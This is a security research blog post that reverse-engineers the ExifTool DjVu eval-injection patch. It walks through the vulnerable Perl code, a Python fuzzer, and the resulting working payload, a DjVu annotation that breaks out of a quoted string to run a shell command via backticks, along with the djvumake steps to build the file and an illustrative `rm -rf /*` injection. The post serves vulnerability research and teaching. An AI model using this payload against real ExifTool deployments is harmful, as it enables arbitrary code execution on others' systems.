The bug

In the early morning of the 24th of April, an interesting exploit popped up on my Twitter feed:

The tweet shows how running Exiftool on a simple image causes arbitrary code execution. This piqued my interest, as Exiftool is not only really common in CTF challenges, but also used in tons of software that needs to display Exif data.

Proof-of-concept code for the exploit wasn’t public yet [1], so I set out to reverse the security patch and find a way to exploit it.

Examining the patch

Let’s start by looking at the release notes for the patched version (12.24). We’ll find exactly one entry about a security issue that got fixed in this release.

Apr. 13, 2021 - Version 12.24
 [...]
  - Patched security vulnerability in DjVu reader
 [...]

Armed with this information, we can examine the git diff between version 12.23 and version 12.24. More specifically, let’s look at the changes to lib/Image/ExifTool/DjVu.pm, the Perl module that handles DjVu data.

--- a/lib/Image/ExifTool/DjVu.pm
+++ b/lib/Image/ExifTool/DjVu.pm
@@ -227,10 +227,11 @@ Tok: for (;;) {
                 last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
                 $tok .= '"';    # quote is part of the string
             }
-            # must protect unescaped "$" and "@" symbols, and "\" at end of string
-            $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
-            # convert C escape sequences (allowed in quoted text)
-            $tok = eval qq{"$tok"};
+            # convert C escape sequences, allowed in quoted text
+            # (note: this only converts a few of them!)
+            my %esc = ( a => "\a", b => "\b", f => "\f", n => "\n",
+                        r => "\r", t => "\t", '"' => '"', '\\' => '\\' );
+            $tok =~ s/\\(.)/$esc{$1}||'\\'.$1/egs;
         } else {                # key name
             pos($$dataPt) = pos($$dataPt) - 1;
             # allow anything in key but whitespace, braces and double quotes

Alright, at this point, we know two things:

  • There is an awful eval injection.
  • The bug is in these two lines of code, found in the ParseAnt function.
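
To make the replacement lines in the diff concrete, here is a rough Python port of them. The names ESC and unescape are mine, not ExifTool's, and this is only a sketch of the idea: known escapes come from a fixed lookup table, everything else is left alone, and nothing is ever evaluated.

```python
import re

# Mirrors the %esc hash from the patch: the only escapes that get converted.
ESC = {"a": "\a", "b": "\b", "f": "\f", "n": "\n",
       "r": "\r", "t": "\t", '"': '"', "\\": "\\"}

def unescape(tok: str) -> str:
    """Python sketch of: $tok =~ s/\\(.)/$esc{$1}||'\\'.$1/egs"""
    # DOTALL plays the role of Perl's /s flag, so "." also matches a newline.
    return re.sub(r"\\(.)",
                  lambda m: ESC.get(m.group(1), "\\" + m.group(1)),
                  tok, flags=re.DOTALL)

print(repr(unescape('say \\"hi\\"\\n')))
print(repr(unescape('" . `id` . "')))
```

The second call is the interesting one: a token full of quotes and backticks comes back unchanged, because a table lookup has no way to run it.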

Deja-what?

But before we dig deeper into the patch, what even is a DjVu file? DjVu is a document format, somewhat similar to PDF. It is not very commonly used, but it has a number of different annotation and metadata fields that Exiftool can parse.

Creating a DjVu File

To create a DjVu file, we’ll be using the DjVuLibre suite on Linux. The contents of the file don’t really matter; we only care about the attached metadata.

First, we create a text file with these contents:

(metadata
	(note "Hello World!")
)

Then make a new empty DjVu file, using the text file as annotation data:

djvumake test.djvu INFO=0,0 BGjp=/dev/null ANTa=annotation-file.txt

When we now parse this file with Exiftool, we’ll see the “Hello World!” note in the output.
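
If you want to script these two steps, something like the following Python sketch should do. The helper names annotation_text and djvumake_command are made up for this example, and the escaping of backslashes and quotes in values is my assumption about what a well-formed annotation string needs. The djvumake arguments are the ones from the command above.

```python
def annotation_text(fields: dict) -> str:
    """Build a (metadata ...) annotation block from key/value pairs."""
    lines = ["(metadata"]
    for key, value in fields.items():
        # Assumption: values are C-style strings, so escape \ and ".
        escaped = value.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'\t({key} "{escaped}")')
    lines.append(")")
    return "\n".join(lines) + "\n"

def djvumake_command(djvu_path: str, annotation_path: str) -> list:
    """Return the djvumake argv that embeds the annotation file."""
    return ["djvumake", djvu_path, "INFO=0,0", "BGjp=/dev/null",
            f"ANTa={annotation_path}"]

print(annotation_text({"note": "Hello World!"}))
print(djvumake_command("test.djvu", "annotation-file.txt"))
```

Write the text to annotation-file.txt, pass the command list to subprocess.run, and then point Exiftool at test.djvu as before.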

Walking the happy path

Before we try to feed Exiftool invalid data, let’s figure out how this metadata is parsed.

The DjVu.pm module first uses the following snippet to check if there are any annotations attached to the file:

sub ProcessAnt($$$)
{
    # ... < snip > ...
    # quick pre-scan to check for metadata or XMP
    return 1 unless $$dataPt =~ /\(\s*(metadata|xmp)[\s("]/s;

    # parse annotations into a tree structure
    pos($$dataPt) = 0;
    my $toks = ParseAnt($dataPt) or return 0;
    # ... < snip > ...
}

As long as our annotation data contains (xmp or (metadata followed by whitespace, an opening parenthesis or a double quote, we’ll reach the vulnerable ParseAnt function. This function extracts the individual “tokens” and returns them as a tree structure.
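
The pre-scan is easy to try out in isolation. Below is a small Python sketch using the same pattern as the Perl snippet; has_metadata is a name I picked, and the sample annotations are only illustrative. Note that the pattern is not anchored, so the keyword can appear anywhere in the annotation data.

```python
import re

# Same pattern as the pre-scan in ProcessAnt; DOTALL stands in for Perl's /s.
PRESCAN = re.compile(r'\(\s*(metadata|xmp)[\s("]', re.DOTALL)

def has_metadata(annotation: str) -> bool:
    """True if the annotation data would be handed to ParseAnt."""
    return PRESCAN.search(annotation) is not None

print(has_metadata('(metadata\n\t(note "Hello World!")\n)'))
print(has_metadata('(background #FFFFFF)'))
print(has_metadata('(background #FFFFFF) (xmp "x")'))
```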

The Vulnerability

Eval

Since we know the exact lines that changed, it is easy to pin down the vulnerability. Once ParseAnt has found a string within double quotes (saved in $tok), it executes the following lines of code:

# must protect unescaped "$" and "@" symbols, and "\" at end of string
$tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
# convert C escape sequences (allowed in quoted text)
$tok = eval qq{"$tok"};

The qq{} operator builds an interpolated string, so the double quotes inside it are literal characters in the code handed to eval, wrapped around the contents of $tok. How could this be exploited? Well, if $tok can contain quotes, an attacker might pass the following payload into eval:

# $tok = '" . `rm -rf  /*` ."'
$tok = eval qq{"" . `rm -rf  /*` . ""};

This will concatenate (.) the output of rm -rf /* with two empty strings. Sadly for us, $tok is filtered in an attempt to prevent this attack, so we can’t simply include quotes.
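
The same class of bug is easy to reproduce in other languages. Here is a harmless Python analogue (not the Perl code itself; naive_unquote is a made-up name) that wraps a token in quotes and evaluates it, just like the line above does:

```python
def naive_unquote(tok: str) -> str:
    # Same shape as the Perl line: put quotes around the token, then eval it.
    return eval('"' + tok + '"')

# A well-behaved token: the escape sequence is converted, nothing else happens.
print(repr(naive_unquote("tab\\there")))

# A token containing bare quotes closes the string early, so the middle part
# runs as code. A harmless multiplication stands in for a shell command here.
print(repr(naive_unquote('" + str(6 * 7) + "')))
```

The first call returns the text with a real tab in it. The second returns the result of the multiplication, which means the token was executed rather than unescaped.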

Filter bypass

We need to find a way to smuggle a quote into the eval statement without it being escaped. The following code snippet is responsible for finding a substring to pass to eval. It might be a bit hard to read if you’re not too familiar with Perl, but the basic idea is as follows:

  1. Loop over all characters.
  2. If we find a double quote, start building a substring.
  3. End the substring at the next non-escaped double quote and eval it.

Tok: for (;;) {
    # find the next token
    last unless $$dataPt =~ /(\S)/sg;   # get next non-space character
    if ($1 eq '(') {       # start of list
        # ... < snip > ...
    } elsif ($1 eq '"') {  # quoted string
        $tok = '';
        for (;;) {
            # get string up to the next quotation mark
            my $pos = pos($$dataPt);
            last Tok unless $$dataPt =~ /"/sg;
            $tok .= substr($$dataPt, $pos, pos($$dataPt)-1-$pos);
            # we're good unless quote was escaped by odd number of backslashes
            last unless $tok =~ /(\\+)$/ and length($1) & 0x01;
            $tok .= '"';    # quote is part of the string
        }
        # must protect unescaped "$" and "@" symbols, and "\" at end of string
        $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge;
        # convert C escape sequences (allowed in quoted text)
        $tok = eval qq{"$tok"};
    } else {
        # ... <snip> ...
    }
    # ... <snip> ...
}
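
The “protect” substitution in that snippet is worth looking at on its own. The following is a Python sketch of that single line (protect is my name for it, and I'm assuming Python's re module behaves like Perl here, which it does for this pattern as far as I can tell):

```python
import re

def protect(tok: str) -> str:
    """Python sketch of: $tok =~ s{\\(.)|([\$\@]|\\$)}{'\\'.($2 || $1)}sge"""
    # \\(.)  : an existing escape pair, re-emitted unchanged
    # [$@]   : a bare sigil, gets a backslash so Perl won't interpolate it
    # \\$    : a lone backslash at the end, gets doubled
    return re.sub(r"\\(.)|([$@]|\\$)",
                  lambda m: "\\" + (m.group(2) or m.group(1)),
                  tok, flags=re.DOTALL)

for sample in ["cost: $5", "a@b", "\\$x", "end\\", 'say "hi"']:
    print(repr(sample), "->", repr(protect(sample)))
```

Notice that the last sample passes through untouched. The substitution never escapes a double quote by itself; it relies entirely on the loop before it to make sure no bare quote ends up inside $tok.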

If you’re familiar with Perl, you may be able to spot the bug directly. As a Perl noob, I struggled to find a filter bypass manually. Instead, I made a simple Python fuzzer to find the escape.

Can we make a fuzzer pop calc?

First, let’s reason about what our payload must look like. We know it has to start with (xmp " to trigger the eval we’re interested in. Beyond that, we need some kind of payload in the middle, followed by some additional escape characters as a suffix.

With this information, we can build the following template string:

TEMPLATE = r"(xmp \"{}`mate-calc`{}"

Next, we create a few helper functions to create a DjVu file and parse it with Exiftool.

import random
from subprocess import PIPE, Popen, TimeoutExpired

def get_data():
    k1 = random.randint(0, 10)
    k2 = random.randint(0, 10)
    # Special characters that may hit edge cases.
    alph  = "\\\".+*\n"
    # Pick some random characters to insert into our template.
    before = ''.join(random.choices(alph, k=k1))
    after  = ''.join(random.choices(alph, k=k2))
    return TEMPLATE.format(before, after).encode()

def do_fuzz_case():
    # Create an annotation file
    data = get_data()
    with open("fuzz-annotation.txt", "wb") as ant_file:
        ant_file.write(data)
    # Embed it in a new DjVu file
    p = Popen(["djvumake", "fuzz.djvu", "INFO=0,0", "BGjp=/dev/null",
               "ANTa=fuzz-annotation.txt"])
    try:
        # djvumake would sometimes get stuck, so I added a small timeout.
        p.communicate(timeout=0.8)
    except TimeoutExpired:
        # Kill the stuck process and reap it before skipping this case.
        p.kill()
        p.communicate()
        return False
    # Parse the DjVu file with Exiftool
    p = Popen(["./exiftool/exiftool", "fuzz.djvu"], stdout=PIPE, stderr=PIPE)
    stdout, stderr = p.communicate()
    # If Exiftool returned a warning, print the fuzz case that caused it.
    if stderr:
        print(f">>>{data}<<<", stderr)
    return True

Now all that’s left is to call this function over and over again until we get interesting output. This fuzzer is not very sophisticated [2], and will only get a couple execs per second. Nevertheless, it starts to produce interesting errors within a couple minutes:

>>>b'(xmp \\"\\\n"\\*"\\"."`mate-calc`\\\n'<<< b'Backslash found where operator expected at (eval 8) line 2, near ""\\\n"\\"\n\t(Missing operator before \\?)\n'

>>>b'(xmp \\"\\\n"+*\\*\n`mate-calc`"""\n\\?"."'<<< b'String found where operator expected at (eval 8) line 3, at end of line\n\t(Missing semicolon on previous line?)\n'

>>>b'(xmp \\"+\\"\\\n"*\\""`mate-calc`"+*+"..'<<< b'Argument "+"\\n" isn\'t numeric in multiplication (*) at (eval 8) line 1.\n'

In my opinion, the last crash is the easiest to understand and ultimately helped me the most in recreating the exploit, so it seems like a good place to start. After minimizing the crash file, we end up with the following annotation data:

(xmp "\
"*\""

Argument "\n" isn't numeric in multiplication (*) at (eval 8) line 1.

The warning informs us that our eval tried to do a multiplication of a newline character with something. This looks promising! If we can do multiplications, we have broken out of the double quotes and can execute Perl code.

Now all we need to do is replace the multiplication with a string concatenation and execute a shell command:

(xmp "\
" . `mate-calc` . \""

Calc.djvu

So how does this bypass work?

The bypass relies on the following line that determines where to “cut” the token:

# we're good unless quote was escaped by odd number of backslashes
last unless $tok =~ /(\\+)$/ and length($1) & 0x01;

The regex is meant to check whether the current substring ends in an odd number of backslashes. If it does, the quote it just found is assumed to be properly escaped, and should be part of the metadata.

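This logic breaks down when the last two characters before the quote are a backslash and a linebreak. In a Perl regex, $ matches not only at the very end of the string but also just before a trailing newline, so the regex sees a backslash followed by a newline and “thinks” the string ends in a single backslash. This causes the quote to be included in the substring, even though the backslash is actually escaping the linebreak instead of the quote.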

At this point, we’ve broken out of the string context and we can start executing arbitrary Perl code. Finally, we need to end our payload with one escaped quote, followed by a real quote to end this token.
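
To double-check this explanation, here is a Python sketch of the pre-patch quoted-string branch of ParseAnt. It is my own port, not ExifTool code, and read_quoted is a made-up name. It relies on Python's $ sharing the “end of string or just before a trailing newline” behaviour with Perl's. Instead of calling eval, it returns the source text that Perl would have evaluated.

```python
import re
from typing import Optional

def read_quoted(data: str, start: int = 0) -> Optional[str]:
    """Return the Perl source the old code would eval, or None if unterminated.

    `start` is the index of the first character after the opening quote.
    """
    tok = ""
    pos = start
    while True:
        end = data.find('"', pos)          # get string up to the next quote
        if end == -1:
            return None                    # Perl: last Tok
        tok += data[pos:end]
        pos = end + 1
        # "$" also matches just before a trailing newline, as it does in Perl.
        m = re.search(r"(\\+)$", tok)
        if not (m and len(m.group(1)) & 1):
            break                          # quote was not "escaped": token ends
        tok += '"'                         # quote is kept as part of the string
    # protect "$", "@" and a trailing backslash; escape pairs stay as they are
    tok = re.sub(r"\\(.)|([$@]|\\$)",
                 lambda m: "\\" + (m.group(2) or m.group(1)),
                 tok, flags=re.DOTALL)
    return '"' + tok + '"'

benign = 'say \\"hi\\"" trailing'
payload = '\\\n" . `mate-calc` . \\""'
print(read_quoted(benign))
print(read_quoted(payload))
```

For the benign input, every quote inside the result is preceded by a backslash. For the payload, the quote right after the backslash and linebreak comes out bare, so Perl closes the string there and treats the rest, backticks included, as code.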


  1. This post was written on the 26th of April, but only made public on the 11th of May after the initial report was released.

  2. In fact, this is probably the worst fuzzer I’ve ever written. It’s single-threaded, hits disk twice per fuzz case, prints to stdout, …